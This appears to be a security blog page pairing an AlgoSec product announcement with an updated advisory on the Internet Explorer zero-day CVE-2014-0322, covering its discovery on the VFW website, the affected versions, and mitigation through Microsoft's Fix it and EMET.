The AlgoSec Suite, with application-centric vulnerability management is available immediately. The new solution will be demonstrated at RSA at AlgoSec’s booth #427.


To learn more about this solution, join us for a webcast on March 12 at 1pm ET on Managing Risk and Vulnerabilities in a Business Context. Read the full news release.


Update 2: Microsoft just published KB2934088, which acknowledges the vulnerability in Internet Explorer 9 and 10 and provides a Fix it that uses the MSHTML shim mechanism to patch Internet Explorer. The MSHTML shim was originally developed for application compatibility, but has been used successfully for a number of security problems in the past year. Microsoft has a post on its SRD blog that explains the vulnerable versions and the defensive options available.


Update: It seems both Internet Explorer 9 and 10 are affected. That equates to a large share of all users, just over 30%. Implementing EMET makes a lot of sense, since it deflects this attack and countered last year's known 0-days of this type as well.


Original: On Patch Tuesday, when Microsoft released new versions of Internet Explorer (6-11) addressing 24 vulnerabilities, FireEye detected a previously unknown attack on IE10 at the website of the Veterans of Foreign Wars (. The attack uses an Adobe Flash object to set up the environment for the rest of the exploit. Currently this 0-day vulnerability (CVE-2014-0322) only applies to Internet Explorer 10; other versions are not affected. EMET, as during many of last year's IE 0-days, also prevents the exploit from succeeding, but this time because the exploit itself checks for EMET's presence and aborts if it is found.


Stay tuned for more updates.